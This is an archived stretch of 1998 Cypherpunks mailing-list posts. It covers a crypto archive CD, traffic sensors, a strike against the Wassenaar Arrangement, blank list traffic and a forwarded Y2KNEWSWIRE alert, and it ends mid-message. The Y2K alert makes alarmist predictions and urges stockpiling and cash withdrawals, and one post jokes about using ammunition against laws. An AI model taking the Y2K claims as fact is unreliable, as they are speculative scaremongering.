Content-Type: text/plain



We have an open CD platter available, and would be *very* happy to host
it, although it would be a low-bandwidth slot.  

Yours, 
J.A. Terranson
sysadmin@mfn.org

--
If Governments really want us to behave like civilized human beings, they
should give serious consideration towards setting a better example:
Ruling by force, rather than consensus; the unrestrained application of
unjust laws (which the victim-populations were never allowed input on in
the first place); the State policy of justice only for the rich and 
elected; the intentional abuse and occassionally destruction of entire
populations merely to distract an already apathetic and numb electorate...
This type of demogoguery must surely wipe out the fascist United States
as surely as it wiped out the fascist Union of Soviet Socialist Republics.

The views expressed here are mine, and NOT those of my employers,
associates, or others.  Besides, if it *were* the opinion of all of
those people, I doubt there would be a problem to bitch about in the
first place...
--------------------------------------------------------------------


On Wed, 9 Dec 1998 mgraffam@idsi.net wrote:

:Date: Wed, 9 Dec 1998 19:24:31 -0500 (EST)
:From: mgraffam@idsi.net
:To: cypherpunks@toad.com
:Subject: A server for a crypto CD?
:
:
:Hello all .. 
:
:Does anyone have a server with a CDROM drive?
:
:I have a 500+ meg archive of crypto-related material (crypto, stego,
:tempest, information theory, etc). Lots of software, applications,
:and papers (100M or so). 
:
:I'd be glad to burn out a CD, and send it to anyone who can put the
:material online. It'll take time to get it ready: I need time to
:strip out some stuff (non-redistributable Fortezza stuff .. its probably
:a moot point, now that we have Skipjack, but why risk it for something
:so dumb?). 
:
:If you have the bandwidth, let me know.
:
:Michael J. Graffam (mgraffam@idsi.net)
:They (who) seek to establish systems of government based on the
:regimentation of all human beings by a handful of individual rulers..
:call this a new order. It is not new, and it is not order."
:				- Franklin Delano Roosevelt
:
:




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Thu, 10 Dec 1998 13:18:48 +0800
To: cypherpunks@cyberpass.net
Subject: lots of juicy y2k news
Message-ID: <199812100437.UAA23232@netcom13.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain




------- Forwarded Message

Date: Wed, 09 Dec 1998 13:41:51 -0700
From: Bill Mee <bill.mee@lmco.com>
Subject: Y2K Alert - San Francisco blackout - Pentagon way behind schedul

The following is a free Y2K alert + analysis from Y2KNEWSWIRE.COM. 
____________________________________________________________


SPECIAL ALERT

SAN FRANCISCO BLACKOUT!
Guess what, folks: the power system *is* vulnerable to a
domino-effect failure. Earlier today (Tuesday), over one million
residents of San Francisco lost power. According to this WIRED
story (link below), here's what happened (as described by the
WIRED story):

"An electrical power substation about 20 miles south of San
Francisco failed shortly after 8:15 a.m. Tuesday, causing a chain
reaction that tripped the two main power generators in San
Francisco and knocked out power to 375,000 utility customers in a
49-mile square area. Pacific Gas and Electric estimated that 938,
000 people were affected by the outage."

The story quotes Peter Neumann, author of "Computer Related
Risks," as saying, "The entire power generation, transmission,
and distribution problem is suffering, because there is very
little spare power anymore."

The cause of the problem? According to the power company, "The
cause of the outage was simple human error, which then triggered
a complex sequence of events."

That's frightening. If "simple human error" can cause this, what
might complex human error (i.e. Y2K) cause?

The power outage caused massive problems. The SFO airport
suffered a total power failure and was running on generators, and
BART, the Bay Area Rapid Transit system, lost 17 of its 57 trains.
Elevators were stuck mid-floor and the morning commute was a
frenzy.

THE SAN FRANCISCO REMINDER
This event is a reminder of what can happen when Y2K hits, and
it alerts us to the fallibility of the power services. This was
ONE little glitch. What happens when the Y2K rollover causes a
hundred such problems? Or a thousand? And then you combine those
little glitches with other little glitches from the phone system,
the 911 system, the transportation infrastructure and the banks.
What do you get then?

By the way, this little incident is also going to deplete
inventories of generators in the Bay Area as people finally get
it: Hey, we could lose power! If you live in San Fran and you've
been *thinking* about getting a generator, you're now TOO LATE.
But it's not too late to move out of the city altogether, which
is probably the safest option, considering what might happen if
the power stays off for DAYS instead of hours.

In this case, power was restored within hours to most customers,
but that might not be the case when Y2K hits. Y2KNEWSWIRE
encourages people to stock a 30-day supply of food, water,
medicine, cash and heating supplies in case a much longer power
outage occurs during the 1/1/2000 rollover. Or better yet,
distance yourself from any high-density population center.


AN OVERVIEW OF THE POWER PROBLEM
*  There are few backup power supplies available, so some
failures that used to have backups no longer do
*  Failures DO cascade throughout the system. In this case, one
small substation caused a power loss to one million people
*  Power failures almost immediately bring a city to its knees.
All transportation is immediately threatened, and few businesses
have enough fuel to run generators longer than 24 hours.
*  All it takes is one simple little human mistake to cause one
million people to lose power. What might a complex, unpredictable
problem like Y2K cause to happen?
*  Demands on the power system are higher than ever, and extra
power bandwidth is almost non-existent. There is very little
"extra" to go around if power stations start to fail.


Read the WIRED story at:
http://www.wired.com/news/news/technology/story/16710.html

Or, an earlier report at:
http://www.wired.com/news/news/technology/story/16709.html

Fox News reports on it, too, at:
http://www.foxnews.com/stage04.sml




PENTAGON WAY BEHIND ON Y2K REPAIRS
This Union Tribune story (link below) describes the unimpressive
status of the Pentagon's Y2K repairs, stating, "...a recent
Pentagon report states that the Defense Department is behind its
own schedule for rewriting computer software to work after 1999.
While 52 percent of the military's mission-critical weapons and
computers meet Y2K standards, the Pentagon schedule calls for 100
percent compliance by the end of this month."

There's another deadline that won't be met. It's the old
December 31, 1998 milestone, remember?

So what's going on here, really?

"Y2K is taking longer than expected," says John Pike, a military
analyst for the Federation of American Scientists. The Army and
Air Force are 70% behind schedule and 30% of the Navy's systems
are behind schedule. Yet, somehow, the Air Force is promising to
have 85% of its systems compliant in the "coming weeks."

The story also reports how the NSA (National Security Agency)
has only 19% of its systems ready, and some fixes aren't even
scheduled to be done until October of 1999. And that's if they're
on-time!

DENIAL IN ACTION
With all this in mind, this story reports that John Hamre, the
Pentagon's No. 2 civilian says, "The Department of Defense will
be able to defend the United States of America on the 1st of
January 2000, no question about it." Then another Pentagon
official (unnamed) says *other* countries are still in denial.

THE ACCIDENTAL NUKE LAUNCH THEORY
The nuke launch theory resurfaces in this story, too, with the
following:

"Hobbled by a flat-line economy and deteriorating military,
Russia's nuclear weapons systems are susceptible to the Y2K Bug,
says analyst Kraig. Or, he says, computer glitches in American
early-warning systems might falsely indicate a Russian missile
launch. He suggests that the United States, Russia and other
nations with nuclear weapons stand down their missiles until
potential Y2K problems are resolved."

Link at:
http://www.uniontrib.com/news/uniontrib/sun/news/news_1n6year.
html

BUT CAN MISSILES REALLY LAUNCH ON THEIR OWN?
Yep. South Korea proved it just last Friday. Read this story:


CIRCUITRY GLITCH LAUNCHES MISSILE IN SOUTH KOREA
While the world debates whether nuclear missiles might be
accidentally launched by a Y2K-related computer glitch, last
Friday saw a fully-armed anti-aircraft missile *accidentally*
fired in South Korea. It killed three people from the raining
debris.

This Reuters story reports: "The Korean air force said in a
statement that a circuitry defect occurred as soldiers turned on
a switch which signified that all was ready for inspection.
'Normally the missile cannot be launched with this switch,' the
statement said. 'A circuitry problem, not human error, was the
cause of the accident,' it added."

Obviously, nuclear missile have far more robust safeguards
against accidental launch than an anti-aircraft missile, but the
comparisons are inevitable. At the very least, this incident
proves once and for all that problems with the circuitry
(embedded systems) can cause missiles to accidentally launch.

Read the story at:
http://dailynews.yahoo.com/headlines/wl/story.html?
s=v/nm/19981204/wl/korea_36.html
(Sorry about the extra-long URL link. You might have to reattach
the two halves if your e-mail program 'wrapped' it.)


WILL GOD PROVIDE?
It's fascinating. Here at Y2KNEWSWIRE.COM, we receive about ten
remove requests each week stating, essentially, "Take me off this
list. I don't need to prepare. God will provide for me."

We're guessing these people forgot about the story of Noah. God
helps those people who prepare, not those who ignore all the
warnings and think of God as some kind of giant FEMA service.
Whether or not you think God will help you through this crisis,
you *still* need to prepare. Don't let your faith in God be an
excuse to do nothing.

The people *best* prepared for Y2K, it seems, are those who are
spiritually, mentally and physically prepared.


MORE DETAILS ON FDIC'S CUSTOMER PROFILING PLAN
We've been called frauds and hoaxers for mentioning the FDIC's
new "Big Brother" plans that would have banks tracking and
monitoring all your private banking behavior and reporting to the
"authorities" any time your behavior veers from what's considered,
"normal."

Some of you didn't believe this was real. You were skeptical.

So today we're posting the actual link on the FDIC's site that
spells it out. Read it yourself and wake up: the banks and the
FDIC are going to play hardball on this Y2K issue. They'll do
everything in their power to discourage cash withdrawals while
putting a positive spin on it (notice the tame name, the "Know
Your Customer" program!). Why? Because they're fighting for
survival. Here's some of the text from the FDIC site (link below):

"SUMMARY: The FDIC is proposing to issue a regulation requiring
insured nonmember banks to develop and maintain "Know Your
Customer'' programs. As proposed, the regulation would require
each nonmember bank to develop a program designed to determine
the identity of its customers; determine its customers' sources
of funds; determine the normal and expected transactions of its
customers; monitor account activity for transactions that are
inconsistent with those normal[[Page 67530]]and expected
transactions; and report any transactions of its customers that
are determined to be suspicious, in accordance with the FDIC's
existing suspicious activity reporting regulation."

Notice the words being used here: ...determine the identify...
determine customers' sources of funds...monitor account activity..
.report any transactions determined to be suspicious...
suspicious activity reporting regulation.

These are not the ideas that should be promoted in a free
society. These phrases belong in the realm of a Police State,
where every person is monitored in order to "root out the
criminals." Or, in this case, to root out people wanting cash for
Y2K.

What happened to the idea of privacy for American citizens? If
this FDIC regulation passes, you can forget about it. Not only
will federal authorities have the right to dig through your bank
records at their leisure, the people working at the bank will be
legally *required* to snoop on you.

Interestingly, the proposed FDIC Big Brother regulation may
actually accelerate the cash demand as people try to beat the
"Know Your Customer" deadline and get their cash out early. The
FDIC may actually cause its own worst nightmare.

Read the text yourself at:
http://www.fdic.gov/lawsregs/fedr/98knocus.txt

Want to comment on the FDIC's Big Brother plan? Here's the
information given by the FDIC:

DATES: Comments must be received by March 8, 1999. ADDRESSES:
Comments should be directed to: Robert E. Feldman, Executive
Secretary, Attention: Comments/OES, Federal Deposit Insurance
Corporation, 550 17th Street, N.W., Washington, DC 20429.
Comments may be hand-delivered to the guard station at the rear
of the 550 17th Street Building (located on F Street), on
business days between 7 a.m. and 5 p.m. In addition, comments may
be sent by fax to (202) 898-3838, or by electronic mail to
comments@FDIC.gov. Comments may be inspected and photocopied in
the FDIC Public Information Center, Room 100, 801 17th Street, NW,
Washington, D.C., between 9 a.m. and 4:30 p.m., on business days.
FOR FURTHER INFORMATION CONTACT: Carol A. Mesheske, Special
Activities Section, Division of Supervision, (202) 898-6750, or
Karen L. Main, Counsel, Legal Division (202) 898-8838.

But wait! The FDIC e-mail address given here *doesn't even work!
* It appears the FDIC doesn't really want your comments. We dug
up the right address:
commentsoes@fdic.gov


WIGGLE ROOM
Don't ya love these Year 2000 "compliance statements" put out by
banks? Here's one sent in by a reader. It shows *lots* of wiggle
room:

"California Federal Bank has already anticipated these problems.
Our Year 2000 Project Team has conducted a comprehensive review
to determine the changes we need to make to our systems. Some of
the modifications are currently being made, and we expect to test
and have the majority of the modifications functioning by
December 31, 1998. I hope that I have been able to address all of
your concerns. If you have any further questions, written
inquiries may be mailed to our Year 2000 Project Team..."

With this kind of statement, even missing the December 31
deadline means you're still "on track" because you can claim that
you never promised ALL the systems would be done on time. Here's
our favorite phrase: "comprehensive review." If you've ever been
part of any committee, you're fully aware of the meaningless of
this phrase.


RIGHT ON TIME, CNN USES THE WORD, 'HOARDING'
Just as Y2KNEWSWIRE warned, some media outlets are going to
start bashing those who are smart enough to prepare for Y2K.
Right on cue, CNN publishes this AP story entitled, "Worry over
Y2K sparks hoarding of dried foods."

See it at:
http://www.cnn.com/FOOD/news/9812/07/y2k.hoarding.ap/

WATCH CAREFULLY! Watch for the gerund "hoarding" to metamorph
into a plural noun: "hoarders!" It will happen, and when it does,
that's a sign that the mainstream is beginning the attack on
those who prepare. We predicted it months ago, and you'll see it
soon enough, because the people who waited until the last minute
are going to be angry when they can't find the supplies they want.
And who will they blame? Those who prepared early, of course.

That is, unless the folks in Washington show some leadership and
actually encourage people to take some common-sense, basic
preparations. In fact, just today, Y2KNEWSWIRE issues a
nationwide press release urging John Koskinen to take some action
on this. Read our statement at:

http://www.y2knewswire.com/koskinen.htm


DETAILS ON THE POSTAL SERVICE?
There's one government agency we haven't heard much from on Y2K
yet: the postal service. If you work for the USPS and you'd like
to tell us what you know about its Y2K preparedness, give us a
shout at tips@y2knewswire.com

We'll keep you anonymous, of course, so you don't get fired.


MISSOURI DEPT. OF HEALTH DEMANDS DOCTORS PROVE THEIR COMPLIANCE
The Missouri Dept of Health is getting Missouri doctors hot
under the collar. A recent letter sent to all Missouri-based
health practitioners commands them to present detailed
descriptions of the steps they've taken to make their computers
Y2K-compliant. These must be returned by December 24th of this
year, and those who are late will receive stiff penalties.

Our guess is the Mo. Dept. of Health isn't even compliant yet.

More importantly, this brings up a critical Y2K point: you can't
just DEMAND everything be fixed on time. That doesn't mean it
will be fixed. China is trying this right now, threatening
criminal sentencing for companies that don't get compliant in
time. (Wow, neat trick.) The state of Florida is trying something
similar, although probably without the China-style imprisonment.

It's hilarious to see bureaucrats beat their heads against the
wall on this. They're so used to passing laws to change peoples'
behavior, they think it applies to Y2K as well. They think they
can just *regulate* the results of Y2K repairs, actually causing
things to be fixed by simply demanding so.

If anything, Y2K is going to laughingly demonstrate the futility
of over-legislation. If you criminalize "not being compliant,"
you don't solve the problem, you just end up with LOTS of
criminals after 2000.


FCC WORRIED ABOUT PLANES HITTING TOWERS
As often as the Y2K skeptics refer to, "planes falling out of
the sky," they almost never give it the serious thought it
deserves. There are, in fact, a dozen or more ways planes can
actually "fall from the sky," all related to Y2K.

The FCC recently revealed yet another one we haven't thought of
yet: planes hitting unlit radio towers. In fact, this scenario
has the FCC so worried, they recently issued an "Antenna
Structure Lighting Responsibilities" statement. Their summary of
the problem leaves nothing to the imagination. They say,
"Y2K-related problems could cause a structure's light systems to
fail, which will create a hazard to air navigation.
Computer-controlled devices, such as those found in automatic
monitoring and control systems used for antenna structure
lighting, are vulnerable to Y2K-related malfunctions, and may
fail. Commercial electric power sources may also fail, leaving
antenna structures vulnerable to blackouts."

The statement goes further, saying, "The Commission considers
all light outages and malfunctions as extremely serious
situations. We therefore expect antenna structure owners (and
licensees, who are secondarily responsible in the event of
default by the owner) to become aware of the ways in which
Y2K-related problems may affect their light systems, and to be
prepared to promptly report and remedy all outages and
malfunctions."

Can you say, "Y2K lawsuit?" We already know that at least *two*
planes are going to be in the sky that night: one carrying Jane
Garvey and the other carrying John Koskinen. Suppose one of these
hits a radio tower (because the lights mysteriously went out).
Major lawsuit time. The FCC has already warned the holders of the
FCC licenses they are, "secondarily responsible" for such events.
In lawyer-speak, that means KA-CHING! Pass the bankroll, buddy,
you just bought yourself a 747.

To review some of the many various ways planes can actually fall
out of the sky:

1) Ground control radar could fail, causing the planes to run
out of fuel.

2) Electronics in the plane itself could fail, causing the pilot
to lose control of the aircraft, resulting in a crash.

3) Navigation electronics could fail, sending the plane into a
mountain or straight into the ground.

4) Faulty air traffic control could result in a mid-air
collision, taking out *two* planes at once.

5) Problems with refueling systems or fuel indicators could make
the ground crew or the pilot think the plane has more fuel than
it does, causing a mid-air depletion of fuel (doesn't seem likely,
but it's one more potential scenario).

Read the FCC details at:
http://www.fcc.gov/cib/Public_Notices/da982408.html


THE Y2KNEWSWIRE MAIL BAG
(Actual e-mail sent from readers.)

"Greetings. I had quite a disturbing reality take place today. I
live in Seattle, WA and I bank with Seafirst, a northwest bank
owned by Bank of America. I went to my local bank with the
intentions of withdrawing my menial savings account of
approximately $3,000. I walked into my bank, filled out a
withdrawal slip, and approached a teller. When the young woman
behind the counter saw the amount that I was trying to withdrawal,
she literally began to panic. She had a brief conference with a
few of her co-workers and then informed me that the bank did not
have the cash to give to me! They were literally "out of money"
as she told me. "You could try and come back later today and we
MIGHT have enough then" she told me. I began to think what a
scary situation we are going to be witnessing when 10 people try
to withdraw just $3,000 each from their accounts! 


Y2KNEWSWIRE ASKS FOR YOUR HELP
Have you recently received a notice from your bank designed to
limit your access to your own money? If so, we'd like to hear
about it. One reader sent in this notice:

"In accordance with Federal Reserve Regulation D, [bank name]
will 
continue to reserve the right to require a 7-day notice on the 
withdrawal of funds in any money market or savings account."

We suspect banks are quietly taking action to place limits on
your ability to get cash. If you have evidence of this at *your*
bank, you can e-mail us at tips@y2knewswire.com


- - - Webmaster


_____________________________________________
Get ready for Y2K, read the Y2K Sourcebook
Get the inside sources for stocking up now
http://www.y2ksupply.com/index.asp?pageid=sourcebook

_____________________________________________
Tell a friend about the free Y2KNEWSWIRE.COM e-mail alert:
http://www.y2knewswire.com/tellafriend.htm

_____________________________________________
Sign the banking crisis petition, help save the banks!
http://www.y2ksupply.com/bankpetition.htm

_____________________________________________
This e-mail message is subject to the following disclaimer:
http://www.y2knewswire.com/Index.asp?pageid=disclaimer
All statements made herein, and made since August of 1998,
are Year 2000 Statements and are retroactively protected
as Year 2000 readiness disclosures under the Good Samaritan Act

_____________________________________________
This message brought to you by: Y2KNEWSWIRE.COM
Feel free to forward this e-mail to anyone.
This may be posted on any web site if credit is given to:
http://www.y2knewswire.com

_____________________________________________
To be removed from this e-mail list, simply go to
the following web address:
http://www.y2ksupply.com/u.asp?E=bill.mee@lmco.com
Or forward this section to removes@y2knewswire.com

_____________________________________________
Join the "believers-only" free Y2K e-mail newsletter:
http://www.y2ksupply.com/believers.htm

_____________________________________________
HOW TO REACH US:
If you have a hot tip for us (anonymity assured):
tips@y2knewswire.com

If you have a compliment:
compliments@y2knewswire.com

If you want to be added to the subscription list (free!), visit
http://www.y2knewswire.com and enter your e-mail address in the
sign up box located at the upper-left corner of the page.

If you have a complaint:
complaints@y2knewswire.com

For questions about ordering:
service@y2knewswire.com

For any other comments:
comments@y2knewswire.com


- - --------------0220774A6B2AF7E94E7A812F--


- ------- End of Forwarded Message


------- End of Forwarded Message




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Multex Investor Network <MultexInvestorNetwork@multexsys.com>
Date: Thu, 10 Dec 1998 11:13:32 +0800
To: cypherpunks@Algebra.COM
Subject: Welcome To The Multex Investor Network
Message-ID: <0caae1344020ac8SMTPGW1@multexnet.com>
MIME-Version: 1.0
Content-Type: text/plain




Dear Jane:

Thank you for becoming a member of The Multex Investor Network! We look
forward to bringing you the world's best and most complete selection of
investment research. We will also be in touch periodically to alert you
to new features, partnerships and offerings. We're excited you have become
one of the thousands of serious investors who have joined our community.

-----------------------------------------------------------------------
  Your User ID is: cypherpinks
  Your password is not displayed in this message for security reasons
-----------------------------------------------------------------------

To complete the registration process and verify your email address, you
will need to activate your account the next time you log in by entering
the code below after you log in. 
Please note, you will not be asked for your activation code until after
you have logged in with your User ID and password. 

-----------------------------------------------------------------------
  Your Activation Code is: 295085
-----------------------------------------------------------------------

You may want to keep a copy of this E-Mail.

If you prefer, you may activate your account immediately by pointing your 
browser to http://www.multexinvestor.com/login.asp. 
After you log-in, you will be asked to enter your activation code.

We look forward to serving you and welcome your comments. You can reach
us at mailto:feedback.min@multexsys.com.

Sincerely,

Jim Tousignant
Senior Vice President





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Lucky Green <shamrock@cypherpunks.to>
Date: Thu, 10 Dec 1998 07:55:46 +0800
To: Michael Motyka <mmotyka@lsil.com>
Subject: Re: No Subject ( camera nonsense )
In-Reply-To: <366EF650.B19@lsil.com>
Message-ID: <Pine.BSF.3.96.981210000312.12684A-100000@pakastelohi.cypherpunks.to>
MIME-Version: 1.0
Content-Type: text/plain



The wire loops (in sets of two a few meters apart) are in every stretch of
freeway in California. They report the numbers and speed of all
vehicles. Have so for decades. This allows the Caltrans operation centers
to instantly identify backups due to accidents, etc. Once in a while, the
evening news do a story on these operation centers.

So we still don't know what the grey sensors do. Note that these sensors
are typically mounted only above the two right lanes.

--Lucky

On Wed, 9 Dec 1998, Michael Motyka wrote:

> Lucky Green wrote:
> > 
> > Traffic analysis is performed using wire loops in the the road. The
> > sensors mountend on overpasses near truck scales fulfill a different (so
> > far unknown) purpose.
> > 
> > --Lucky
> >
> The wire loops I know about use 60Hz AC and measure inductance. I 
> believe that this would make them unsuitable as speed measurement
> devices since measurement would extend over a number of cycles. They
> might work if they were widely separated but you would have to be sure
> there was only one vehicle generating the peaks.
> 
> I'd stick with the speed detector radar for now to explain the overhead
> doo-dads.
> 
> m
> 


-- Lucky Green <shamrock@cypherpunks.to> PGP v5 encrypted email preferred.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: owner-cypherpunks@Algebra.COM
Date: Thu, 10 Dec 1998 15:00:36 +0800
Subject: No Subject
Message-ID: <199812100628.BAA18557@mail.video-collage.com>
MIME-Version: 1.0
Content-Type: text/plain





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: owner-cypherpunks@Algebra.COM
Date: Thu, 10 Dec 1998 15:27:47 +0800
Subject: No Subject
Message-ID: <199812100655.BAA20370@mail.video-collage.com>
MIME-Version: 1.0
Content-Type: text/plain





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: owner-cypherpunks@Algebra.COM
Date: Thu, 10 Dec 1998 17:09:50 +0800
Subject: No Subject
Message-ID: <199812100837.DAA27571@mail.video-collage.com>
MIME-Version: 1.0
Content-Type: text/plain





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: owner-cypherpunks@Algebra.COM
Date: Thu, 10 Dec 1998 18:25:05 +0800
Subject: No Subject
Message-ID: <199812100948.EAA00801@mail.video-collage.com>
MIME-Version: 1.0
Content-Type: text/plain





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: owner-cypherpunks@Algebra.COM
Date: Thu, 10 Dec 1998 18:28:25 +0800
Subject: No Subject
Message-ID: <199812101001.FAA01142@mail.video-collage.com>
MIME-Version: 1.0
Content-Type: text/plain





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: owner-cypherpunks@Algebra.COM
Date: Thu, 10 Dec 1998 21:01:06 +0800
Subject: No Subject
Message-ID: <199812101230.HAA05983@mail.video-collage.com>
MIME-Version: 1.0
Content-Type: text/plain





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: owner-cypherpunks@Algebra.COM
Date: Thu, 10 Dec 1998 22:00:43 +0800
Subject: No Subject
Message-ID: <199812101318.IAA07530@mail.video-collage.com>
MIME-Version: 1.0
Content-Type: text/plain





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: owner-cypherpunks@Algebra.COM
Date: Thu, 10 Dec 1998 22:25:13 +0800
Subject: No Subject
Message-ID: <199812101341.IAA08273@mail.video-collage.com>
MIME-Version: 1.0
Content-Type: text/plain





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: owner-cypherpunks@Algebra.COM
Date: Thu, 10 Dec 1998 22:51:45 +0800
Subject: No Subject
Message-ID: <199812101411.JAA09463@mail.video-collage.com>
MIME-Version: 1.0
Content-Type: text/plain





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: owner-cypherpunks@Algebra.COM
Date: Thu, 10 Dec 1998 23:47:16 +0800
Subject: No Subject
Message-ID: <199812101452.JAA11059@mail.video-collage.com>
MIME-Version: 1.0
Content-Type: text/plain





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@EINSTEIN.ssz.com>
Date: Fri, 11 Dec 1998 00:57:32 +0800
To: cypherpunks@EINSTEIN.ssz.com (Cypherpunks Distributed Remailer)
Subject: What's up with the blank traffic from algebra.com?
Message-ID: <199812101555.JAA23959@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Hi,

Anyone know why algebra.com is throwing the blank messages over the last
couple of days?


    ____________________________________________________________________

           If I can put in one word what has always infuriated me
           in any person, any group, any movement, or any nation,
           it is: bullying
                                                Howard Zinn

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Missouri FreeNet Administration <measl@mfn.org>
Date: Fri, 11 Dec 1998 01:16:12 +0800
To: Ken Williams <jkwilli2@unity.ncsu.edu>
Subject: Re: Global Strike to protest Wassenaar
In-Reply-To: <Pine.SOL.4.05.9812100902510.28323-100000@ultra1-224wi.eos.ncsu.edu>
Message-ID: <Pine.BSF.3.96.981210095155.7887B-100000@greeves.mfn.org>
MIME-Version: 1.0
Content-Type: text/plain




This is an excellent idea...  I have just massmailed an announcement
to our members: Missouri FreeNet will not be be operating on 14 December.
Has anyone considered creating a (web?) list of persons and organizations
who have committed to this strike? People are more likely to participate
when they know they are no alone...

Yours, 
J.A. Terranson
sysadmin@mfn.org

--
If Governments really want us to behave like civilized human beings, they
should give serious consideration towards setting a better example:
Ruling by force, rather than consensus; the unrestrained application of
unjust laws (which the victim-populations were never allowed input on in
the first place); the State policy of justice only for the rich and 
elected; the intentional abuse and occassionally destruction of entire
populations merely to distract an already apathetic and numb electorate...
This type of demogoguery must surely wipe out the fascist United States
as surely as it wiped out the fascist Union of Soviet Socialist Republics.

The views expressed here are mine, and NOT those of my employers,
associates, or others.  Besides, if it *were* the opinion of all of
those people, I doubt there would be a problem to bitch about in the
first place...
--------------------------------------------------------------------


On Thu, 10 Dec 1998, Ken Williams wrote:

:Date: Thu, 10 Dec 1998 09:05:58 -0500 (EST)
:From: Ken Williams <jkwilli2@unity.ncsu.edu>
:To: cypherpunks@toad.com
:Subject: Global Strike to protest Wassenaar
:
:-----BEGIN PGP SIGNED MESSAGE-----
:
:
:Hi,
:
:"Strike to protest Wassenaar!"
:
:URL:  http://www.zanshin.com/~bobg/
:
:"This is a global call for computer professionals to strike on 
:Monday, 14 December, 1998 to protest the signing of the Wassenaar
:Arrangement, an international treaty that imposes new restrictions 
:on cryptographic software technology. The strike is meant to raise
:awareness about the importance of cryptography, about the U.S. 
:government's wrongheaded attempts to curtail its use, and about the 
:strong-arm tactics used by the United States to pressure other 
:countries into limiting their citizens' rights the way it has 
:limited its own."
:
:
:Regards,
:
:Ken Williams
:
:Packet Storm Security        http://www.Genocide2600.com/~tattooman/
:E.H.A.P. Head of Operations  http://www.ehap.org/   ehap@ehap.org
:NC State CS Dept  http://www.csc.ncsu.edu/   jkwilli2@unity.ncsu.edu
:PGP DSS/DH/RSA Keys          http://www4.ncsu.edu/~jkwilli2/pgpkey/
:
:___________________________________________________________________ 
:Get Your Email Sniffed and Decrypted for Free at http://www.nsa.gov
:
:-----BEGIN PGP SIGNATURE-----
:Version: PGPfreeware 5.0i for non-commercial use
:Charset: noconv
:
:iQEVAwUBNm/VQJDw1ZsNz1IXAQGzygf/Zt/sP419T5dA1gY/Rru7ACtv6xWXWMUA
:HDBQPFbGV8yviOIU7N2bHndWGtr+hjPcdoudoXlOwYF73/TybNSzs6J/iAF9yhSR
:UmRKM+suH8FwJ90F+i36W8hCQrkhPYXEwXW4AWDEeGNKjZdRLApS/POMcnTWoTSK
:iHwDsdE+AevhlcWuC1nk80AlSEVNE/B2zmbWGax12tciM2NxTc4AqtqI3BwXebVq
:f/04ZC9515dR/XHGhtbmQ08sTNS9eQUG8H626XE58XtE+MOsVEJYjUQFDd9L13T2
:dlun/4+U1J9xMmN8uYlUySxKr9XmharSXLJCmpmIaE0bwDwTx7Pkpw==
:=DaVN
:-----END PGP SIGNATURE-----
:
:




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: owner-cypherpunks@Algebra.COM
Date: Thu, 10 Dec 1998 23:48:16 +0800
Subject: No Subject
Message-ID: <199812101515.KAA12702@mail.video-collage.com>
MIME-Version: 1.0
Content-Type: text/plain





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "William H. Geiger III" <whgiii@openpgp.net>
Date: Fri, 11 Dec 1998 00:38:31 +0800
To: Multiple recipients of list <cypherpunks@openpgp.net>
Subject: Re: Hallandale becomes model for the police state
Message-ID: <199812101454.JAA021.00@whgiii>
MIME-Version: 1.0
Content-Type: text/plain



In <3.0.3.32.19981210151350.006add74@209.204.247.83>, on 12/10/98 
   at 09:53 AM, "Albert P. Franco, II" <apf2@apf2.com> said:

>The REAL injustice is that the only way to strike down these ludicrous
>laws is to be able to spend upwards of $5,ooo,ooo for litigation.

Just think how much more efficient $5,000,000 of ammo would be for
resolving these types of problems. <EG>

-- 
---------------------------------------------------------------
William H. Geiger III  http://www.openpgp.net
Geiger Consulting    Cooking With Warp 4.0

Author of E-Secure - PGP Front End for MR/2 Ice
PGP & MR/2 the only way for secure e-mail.
OS/2 PGP 5.0 at: http://www.openpgp.net/pgp.html
---------------------------------------------------------------






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "William H. Geiger III" <whgiii@openpgp.net>
Date: Fri, 11 Dec 1998 01:12:55 +0800
To: Multiple recipients of list <cypherpunks@openpgp.net>
Subject: Re: What's up with the blank traffic from algebra.com?
Message-ID: <199812101507.KAA021.25@whgiii>
MIME-Version: 1.0
Content-Type: text/plain



In <199812101555.JAA23959@einstein.ssz.com>, on 12/10/98 
   at 10:44 AM, Jim Choate <ravage@einstein.ssz.com> said:

>Hi,

>Anyone know why algebra.com is throwing the blank messages over the last
>couple of days?

Well I am glad to see it's not just my node that is getting these. :)


-- 
---------------------------------------------------------------
William H. Geiger III  http://www.openpgp.net
Geiger Consulting    Cooking With Warp 4.0

Author of E-Secure - PGP Front End for MR/2 Ice
PGP & MR/2 the only way for secure e-mail.
OS/2 PGP 5.0 at: http://www.openpgp.net/pgp.html
---------------------------------------------------------------






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@EINSTEIN.ssz.com>
Date: Fri, 11 Dec 1998 01:52:30 +0800
To: cypherpunks@EINSTEIN.ssz.com (Cypherpunks Distributed Remailer)
Subject: A URL to the Monday strike?
Message-ID: <199812101721.LAA24672@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Hi all,

